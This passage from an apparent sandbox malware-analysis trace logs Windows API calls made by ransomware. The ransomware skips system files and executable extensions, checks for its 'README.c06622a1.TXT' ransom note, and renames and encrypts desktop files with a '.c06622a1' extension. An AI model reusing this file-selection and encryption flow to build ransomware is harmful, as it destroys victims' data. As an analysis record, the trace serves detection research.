hFile=0x61c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.114] ReadFile (in: hFile=0x61c, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0148.115] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xd4e6ce64 [0148.115] RtlComputeCrc32 (PartialCrc=0xce64, Buffer=0x3fe674, Length=0x80) returned 0x13dd53f5 [0148.115] RtlComputeCrc32 (PartialCrc=0x53f5, Buffer=0x3fe674, Length=0x80) returned 0xa2127264 [0148.115] RtlComputeCrc32 (PartialCrc=0x7264, Buffer=0x3fe674, Length=0x80) returned 0xa27a42ee [0148.115] RtlComputeCrc32 (PartialCrc=0x42ee, Buffer=0x3fe674, Length=0x80) returned 0x1fd8b84 [0148.115] CloseHandle (hObject=0x61c) returned 1 [0148.115] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0148.115] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\YWEGeiy Lucr J4gfrt.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\YWEGeiy Lucr J4gfrt.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\YWEGeiy Lucr J4gfrt.wav" [0148.115] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\YWEGeiy Lucr J4gfrt.wav") returned 0x5f [0148.115] wcscpy (in: _Dest=0x454016e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.115] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\YWEGeiy Lucr J4gfrt.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\cnswppmo1m-nstwgc\\ywegeiy lucr j4gfrt.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\YWEGeiy Lucr J4gfrt.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\cnswppmo1m-nstwgc\\ywegeiy lucr j4gfrt.wav.c06622a1"), dwFlags=0x8) returned 1 [0148.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\cnsWpPMO1m-nsTwgc\\YWEGeiy Lucr J4gfrt.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\cnswppmo1m-nstwgc\\ywegeiy lucr j4gfrt.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x61c [0148.120] CreateIoCompletionPort (FileHandle=0x61c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.120] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0148.126] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x73399a7e [0148.126] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x467eb2d [0148.126] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x59b26517 [0148.126] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3f98993 [0148.126] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3b48fd10 [0148.126] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x36c1db41 [0148.126] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x38ca4bf5 [0148.126] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2c99657b [0148.129] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0xe0ff4af2 [0148.129] RtlComputeCrc32 (PartialCrc=0x4af2, Buffer=0x4280094, Length=0x80) returned 0x6f63db01 [0148.129] RtlComputeCrc32 (PartialCrc=0xdb01, Buffer=0x4280094, Length=0x80) returned 0xad7a8e2f [0148.129] RtlComputeCrc32 (PartialCrc=0x8e2f, Buffer=0x4280094, Length=0x80) returned 0xb4ef6316 [0148.130] RtlComputeCrc32 (PartialCrc=0x6316, Buffer=0x4280094, Length=0x80) returned 0xfd98bc9f [0148.130] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0148.130] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0148.130] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0148.130] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0148.130] FindClose (in: hFindFile=0x2db87c0 | out: hFindFile=0x2db87c0) returned 1 [0148.130] _wcsicmp (_Str1="backup", _Str2="cnsWpPMO1m-nsTwgc") returned -1 [0148.130] wcslen (_String="backup") returned 0x6 [0148.130] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0148.130] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0148.130] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1c6ca0, ftCreationTime.dwHighDateTime=0x1d5e586, ftLastAccessTime.dwLowDateTime=0xf9ff3360, ftLastAccessTime.dwHighDateTime=0x1d5e353, ftLastWriteTime.dwLowDateTime=0xf9ff3360, ftLastWriteTime.dwHighDateTime=0x1d5e353, nFileSizeHigh=0x0, nFileSizeLow=0x14179, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mf0WvE.flv", cAlternateFileName="")) returned 1 [0148.130] _wcsicmp (_Str1="Mf0WvE.flv", _Str2="README.c06622a1.TXT") returned -5 [0148.130] wcsstr (_Str="Mf0WvE.flv", _SubStr="README") returned 0x0 [0148.130] _wcsicmp (_Str1="autorun.inf", _Str2="Mf0WvE.flv") returned -12 [0148.130] wcslen (_String="autorun.inf") returned 0xb [0148.130] _wcsicmp (_Str1="boot.ini", _Str2="Mf0WvE.flv") returned -11 [0148.130] wcslen (_String="boot.ini") returned 0x8 [0148.130] _wcsicmp (_Str1="bootfont.bin", _Str2="Mf0WvE.flv") returned -11 [0148.130] wcslen (_String="bootfont.bin") returned 0xc [0148.130] _wcsicmp (_Str1="bootsect.bak", _Str2="Mf0WvE.flv") returned -11 [0148.130] wcslen (_String="bootsect.bak") returned 0xc [0148.130] _wcsicmp (_Str1="desktop.ini", _Str2="Mf0WvE.flv") returned -9 [0148.130] wcslen (_String="desktop.ini") returned 0xb [0148.130] _wcsicmp (_Str1="iconcache.db", _Str2="Mf0WvE.flv") returned -4 [0148.131] wcslen (_String="iconcache.db") returned 0xc [0148.131] _wcsicmp (_Str1="ntldr", _Str2="Mf0WvE.flv") returned 1 [0148.131] wcslen (_String="ntldr") returned 0x5 [0148.131] _wcsicmp (_Str1="ntuser.dat", _Str2="Mf0WvE.flv") returned 1 [0148.131] wcslen (_String="ntuser.dat") returned 0xa [0148.131] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Mf0WvE.flv") returned 1 [0148.131] wcslen (_String="ntuser.dat.log") returned 0xe [0148.131] _wcsicmp (_Str1="ntuser.ini", _Str2="Mf0WvE.flv") returned 1 [0148.131] wcslen (_String="ntuser.ini") returned 0xa [0148.131] _wcsicmp (_Str1="thumbs.db", _Str2="Mf0WvE.flv") returned 7 [0148.131] wcslen (_String="thumbs.db") returned 0x9 [0148.131] _wcsicmp (_Str1="386", _Str2="flv") returned -51 [0148.131] wcslen (_String="386") returned 0x3 [0148.131] _wcsicmp (_Str1="adv", _Str2="flv") returned -5 [0148.131] wcslen (_String="adv") returned 0x3 [0148.131] _wcsicmp (_Str1="ani", _Str2="flv") returned -5 [0148.131] wcslen (_String="ani") returned 0x3 [0148.131] _wcsicmp (_Str1="bat", _Str2="flv") returned -4 [0148.131] wcslen (_String="bat") returned 0x3 [0148.131] _wcsicmp (_Str1="bin", _Str2="flv") returned -4 [0148.131] wcslen (_String="bin") returned 0x3 [0148.131] _wcsicmp (_Str1="cab", _Str2="flv") returned -3 [0148.131] wcslen (_String="cab") returned 0x3 [0148.131] _wcsicmp (_Str1="cmd", _Str2="flv") returned -3 [0148.131] wcslen (_String="cmd") returned 0x3 [0148.131] _wcsicmp (_Str1="com", _Str2="flv") returned -3 [0148.131] wcslen (_String="com") returned 0x3 [0148.131] _wcsicmp (_Str1="cpl", _Str2="flv") returned -3 [0148.131] wcslen (_String="cpl") returned 0x3 [0148.131] _wcsicmp (_Str1="cur", _Str2="flv") returned -3 [0148.131] wcslen (_String="cur") returned 0x3 [0148.131] _wcsicmp (_Str1="deskthemepack", _Str2="flv") returned -2 [0148.131] wcslen (_String="deskthemepack") returned 0xd [0148.131] _wcsicmp (_Str1="diagcab", _Str2="flv") returned -2 [0148.132] wcslen (_String="diagcab") returned 0x7 [0148.132] _wcsicmp (_Str1="diagcfg", _Str2="flv") returned -2 [0148.132] wcslen (_String="diagcfg") returned 0x7 [0148.132] _wcsicmp (_Str1="diagpkg", _Str2="flv") returned -2 [0148.132] wcslen (_String="diagpkg") returned 0x7 [0148.132] _wcsicmp (_Str1="dll", _Str2="flv") returned -2 [0148.132] wcslen (_String="dll") returned 0x3 [0148.132] _wcsicmp (_Str1="drv", _Str2="flv") returned -2 [0148.132] wcslen (_String="drv") returned 0x3 [0148.132] _wcsicmp (_Str1="exe", _Str2="flv") returned -1 [0148.132] wcslen (_String="exe") returned 0x3 [0148.132] _wcsicmp (_Str1="hlp", _Str2="flv") returned 2 [0148.132] wcslen (_String="hlp") returned 0x3 [0148.132] _wcsicmp (_Str1="icl", _Str2="flv") returned 3 [0148.132] wcslen (_String="icl") returned 0x3 [0148.132] _wcsicmp (_Str1="icns", _Str2="flv") returned 3 [0148.132] wcslen (_String="icns") returned 0x4 [0148.132] _wcsicmp (_Str1="ico", _Str2="flv") returned 3 [0148.132] wcslen (_String="ico") returned 0x3 [0148.132] _wcsicmp (_Str1="ics", _Str2="flv") returned 3 [0148.132] wcslen (_String="ics") returned 0x3 [0148.132] _wcsicmp (_Str1="idx", _Str2="flv") returned 3 [0148.132] wcslen (_String="idx") returned 0x3 [0148.132] _wcsicmp (_Str1="ldf", _Str2="flv") returned 6 [0148.132] wcslen (_String="ldf") returned 0x3 [0148.132] _wcsicmp (_Str1="lnk", _Str2="flv") returned 6 [0148.132] wcslen (_String="lnk") returned 0x3 [0148.132] _wcsicmp (_Str1="mod", _Str2="flv") returned 7 [0148.132] wcslen (_String="mod") returned 0x3 [0148.132] _wcsicmp (_Str1="mpa", _Str2="flv") returned 7 [0148.132] wcslen (_String="mpa") returned 0x3 [0148.132] _wcsicmp (_Str1="msc", _Str2="flv") returned 7 [0148.132] wcslen (_String="msc") returned 0x3 [0148.133] _wcsicmp (_Str1="msp", _Str2="flv") returned 7 [0148.133] wcslen (_String="msp") returned 0x3 [0148.133] _wcsicmp (_Str1="msstyles", _Str2="flv") returned 7 [0148.133] wcslen (_String="msstyles") returned 0x8 [0148.133] _wcsicmp (_Str1="msu", _Str2="flv") returned 7 [0148.133] wcslen (_String="msu") returned 0x3 [0148.133] _wcsicmp (_Str1="nls", _Str2="flv") returned 8 [0148.133] wcslen (_String="nls") returned 0x3 [0148.133] _wcsicmp (_Str1="nomedia", _Str2="flv") returned 8 [0148.133] wcslen (_String="nomedia") returned 0x7 [0148.133] _wcsicmp (_Str1="ocx", _Str2="flv") returned 9 [0148.133] wcslen (_String="ocx") returned 0x3 [0148.133] _wcsicmp (_Str1="prf", _Str2="flv") returned 10 [0148.133] wcslen (_String="prf") returned 0x3 [0148.133] _wcsicmp (_Str1="ps1", _Str2="flv") returned 10 [0148.133] wcslen (_String="ps1") returned 0x3 [0148.133] _wcsicmp (_Str1="rom", _Str2="flv") returned 12 [0148.133] wcslen (_String="rom") returned 0x3 [0148.133] _wcsicmp (_Str1="rtp", _Str2="flv") returned 12 [0148.133] wcslen (_String="rtp") returned 0x3 [0148.133] _wcsicmp (_Str1="scr", _Str2="flv") returned 13 [0148.133] wcslen (_String="scr") returned 0x3 [0148.133] _wcsicmp (_Str1="shs", _Str2="flv") returned 13 [0148.133] wcslen (_String="shs") returned 0x3 [0148.133] _wcsicmp (_Str1="spl", _Str2="flv") returned 13 [0148.133] wcslen (_String="spl") returned 0x3 [0148.133] _wcsicmp (_Str1="sys", _Str2="flv") returned 13 [0148.133] wcslen (_String="sys") returned 0x3 [0148.133] _wcsicmp (_Str1="theme", _Str2="flv") returned 14 [0148.133] wcslen (_String="theme") returned 0x5 [0148.133] _wcsicmp (_Str1="themepack", _Str2="flv") returned 14 [0148.133] wcslen (_String="themepack") returned 0x9 [0148.133] _wcsicmp (_Str1="wpx", _Str2="flv") returned 17 [0148.133] wcslen (_String="wpx") returned 0x3 [0148.134] _wcsicmp (_Str1="lock", _Str2="flv") returned 6 [0148.134] wcslen (_String="lock") returned 0x4 [0148.134] _wcsicmp (_Str1="key", _Str2="flv") returned 5 [0148.134] wcslen (_String="key") returned 0x3 [0148.134] _wcsicmp (_Str1="hta", _Str2="flv") returned 2 [0148.134] wcslen (_String="hta") returned 0x3 [0148.134] _wcsicmp (_Str1="msi", _Str2="flv") returned 7 [0148.134] wcslen (_String="msi") returned 0x3 [0148.134] _wcsicmp (_Str1="pdb", _Str2="flv") returned 10 [0148.134] wcslen (_String="pdb") returned 0x3 [0148.134] _wcsicmp (_Str1="sql", _Str2="flv") returned 13 [0148.134] wcslen (_String="sql") returned 0x3 [0148.134] _wcsicmp (_Str1="sqlite", _Str2="flv") returned 13 [0148.134] wcslen (_String="sqlite") returned 0x6 [0148.134] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w")) returned 0x10 [0148.134] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0148.134] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w" [0148.134] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w") returned 0x35 [0148.134] wcscpy (in: _Dest=0x45000fc, _Source="Mf0WvE.flv" | out: _Dest="Mf0WvE.flv") returned="Mf0WvE.flv" [0148.134] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Mf0WvE.flv", dwFileAttributes=0x80) returned 1 [0148.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Mf0WvE.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\mf0wve.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0148.139] SetFilePointerEx (in: hFile=0x618, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.139] ReadFile (in: hFile=0x618, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0148.140] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xef8bea7c [0148.140] RtlComputeCrc32 (PartialCrc=0xea7c, Buffer=0x3fe8f4, Length=0x80) returned 0x86e94d67 [0148.140] RtlComputeCrc32 (PartialCrc=0x4d67, Buffer=0x3fe8f4, Length=0x80) returned 0x31c26a53 [0148.140] RtlComputeCrc32 (PartialCrc=0x6a53, Buffer=0x3fe8f4, Length=0x80) returned 0x844fa3b [0148.140] RtlComputeCrc32 (PartialCrc=0xfa3b, Buffer=0x3fe8f4, Length=0x80) returned 0xb9c02c23 [0148.140] CloseHandle (hObject=0x618) returned 1 [0148.140] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0148.140] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Mf0WvE.flv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Mf0WvE.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Mf0WvE.flv" [0148.140] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Mf0WvE.flv") returned 0x40 [0148.140] wcscpy (in: _Dest=0x4510118, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.140] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Mf0WvE.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\mf0wve.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Mf0WvE.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\mf0wve.flv.c06622a1"), dwFlags=0x8) returned 1 [0148.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\Mf0WvE.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\mf0wve.flv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x618 [0148.144] CreateIoCompletionPort (FileHandle=0x618, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.144] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0148.149] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7b241b29 [0148.149] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x37cea208 [0148.149] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2e29a67e [0148.149] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x482133cc [0148.149] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3d59a31c [0148.149] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a85ec0 [0148.149] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x46bdc1d5 [0148.149] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3836defe [0148.153] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0xddc94546 [0148.153] RtlComputeCrc32 (PartialCrc=0x4546, Buffer=0x4670094, Length=0x80) returned 0xdfc35789 [0148.153] RtlComputeCrc32 (PartialCrc=0x5789, Buffer=0x4670094, Length=0x80) returned 0xa8c03158 [0148.153] RtlComputeCrc32 (PartialCrc=0x3158, Buffer=0x4670094, Length=0x80) returned 0x7d95b8d6 [0148.153] RtlComputeCrc32 (PartialCrc=0xb8d6, Buffer=0x4670094, Length=0x80) returned 0x19abd6 [0148.153] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0148.153] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0148.153] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0148.153] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6cdf760, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd6cdf760, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd6cdf760, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0148.153] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0148.153] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1acfce0, ftCreationTime.dwHighDateTime=0x1d5da81, ftLastAccessTime.dwLowDateTime=0xd928b010, ftLastAccessTime.dwHighDateTime=0x1d5e814, ftLastWriteTime.dwLowDateTime=0xd928b010, ftLastWriteTime.dwHighDateTime=0x1d5e814, nFileSizeHigh=0x0, nFileSizeLow=0x12dc7, dwReserved0=0x0, dwReserved1=0x0, cFileName="SsS1Qlj0VTcoohhkUWi.pptx", cAlternateFileName="SSS1QL~1.PPT")) returned 1 [0148.153] _wcsicmp (_Str1="SsS1Qlj0VTcoohhkUWi.pptx", _Str2="README.c06622a1.TXT") returned 1 [0148.153] wcsstr (_Str="SsS1Qlj0VTcoohhkUWi.pptx", _SubStr="README") returned 0x0 [0148.153] _wcsicmp (_Str1="autorun.inf", _Str2="SsS1Qlj0VTcoohhkUWi.pptx") returned -18 [0148.153] wcslen (_String="autorun.inf") returned 0xb [0148.154] _wcsicmp (_Str1="boot.ini", _Str2="SsS1Qlj0VTcoohhkUWi.pptx") returned -17 [0148.154] wcslen (_String="boot.ini") returned 0x8 [0148.154] _wcsicmp (_Str1="bootfont.bin", _Str2="SsS1Qlj0VTcoohhkUWi.pptx") returned -17 [0148.154] wcslen (_String="bootfont.bin") returned 0xc [0148.154] _wcsicmp (_Str1="bootsect.bak", _Str2="SsS1Qlj0VTcoohhkUWi.pptx") returned -17 [0148.154] wcslen (_String="bootsect.bak") returned 0xc [0148.154] _wcsicmp (_Str1="desktop.ini", _Str2="SsS1Qlj0VTcoohhkUWi.pptx") returned -15 [0148.154] wcslen (_String="desktop.ini") returned 0xb [0148.154] _wcsicmp (_Str1="iconcache.db", _Str2="SsS1Qlj0VTcoohhkUWi.pptx") returned -10 [0148.154] wcslen (_String="iconcache.db") returned 0xc [0148.154] _wcsicmp (_Str1="ntldr", _Str2="SsS1Qlj0VTcoohhkUWi.pptx") returned -5 [0148.154] wcslen (_String="ntldr") returned 0x5 [0148.154] _wcsicmp (_Str1="ntuser.dat", _Str2="SsS1Qlj0VTcoohhkUWi.pptx") returned -5 [0148.154] wcslen (_String="ntuser.dat") returned 0xa [0148.154] _wcsicmp (_Str1="ntuser.dat.log", _Str2="SsS1Qlj0VTcoohhkUWi.pptx") returned -5 [0148.154] wcslen (_String="ntuser.dat.log") returned 0xe [0148.154] _wcsicmp (_Str1="ntuser.ini", _Str2="SsS1Qlj0VTcoohhkUWi.pptx") returned -5 [0148.154] wcslen (_String="ntuser.ini") returned 0xa [0148.154] _wcsicmp (_Str1="thumbs.db", _Str2="SsS1Qlj0VTcoohhkUWi.pptx") returned 1 [0148.154] wcslen (_String="thumbs.db") returned 0x9 [0148.154] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0148.154] wcslen (_String="386") returned 0x3 [0148.154] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0148.154] wcslen (_String="adv") returned 0x3 [0148.154] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0148.154] wcslen (_String="ani") returned 0x3 [0148.154] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0148.154] wcslen (_String="bat") returned 0x3 [0148.154] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0148.154] wcslen (_String="bin") returned 0x3 [0148.154] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0148.154] wcslen (_String="cab") returned 0x3 [0148.154] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0148.154] wcslen (_String="cmd") returned 0x3 [0148.154] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0148.154] wcslen (_String="com") returned 0x3 [0148.154] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0148.154] wcslen (_String="cpl") returned 0x3 [0148.155] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0148.155] wcslen (_String="cur") returned 0x3 [0148.155] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0148.155] wcslen (_String="deskthemepack") returned 0xd [0148.155] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0148.155] wcslen (_String="diagcab") returned 0x7 [0148.155] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0148.155] wcslen (_String="diagcfg") returned 0x7 [0148.155] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0148.155] wcslen (_String="diagpkg") returned 0x7 [0148.155] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0148.155] wcslen (_String="dll") returned 0x3 [0148.155] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0148.155] wcslen (_String="drv") returned 0x3 [0148.155] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0148.155] wcslen (_String="exe") returned 0x3 [0148.155] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0148.155] wcslen (_String="hlp") returned 0x3 [0148.155] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0148.155] wcslen (_String="icl") returned 0x3 [0148.155] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0148.155] wcslen (_String="icns") returned 0x4 [0148.155] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0148.155] wcslen (_String="ico") returned 0x3 [0148.155] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0148.155] wcslen (_String="ics") returned 0x3 [0148.155] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0148.155] wcslen (_String="idx") returned 0x3 [0148.155] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0148.155] wcslen (_String="ldf") returned 0x3 [0148.155] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0148.155] wcslen (_String="lnk") returned 0x3 [0148.155] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0148.155] wcslen (_String="mod") returned 0x3 [0148.155] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0148.155] wcslen (_String="mpa") returned 0x3 [0148.155] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0148.155] wcslen (_String="msc") returned 0x3 [0148.155] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0148.156] wcslen (_String="msp") returned 0x3 [0148.156] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0148.156] wcslen (_String="msstyles") returned 0x8 [0148.156] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0148.156] wcslen (_String="msu") returned 0x3 [0148.156] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0148.156] wcslen (_String="nls") returned 0x3 [0148.156] 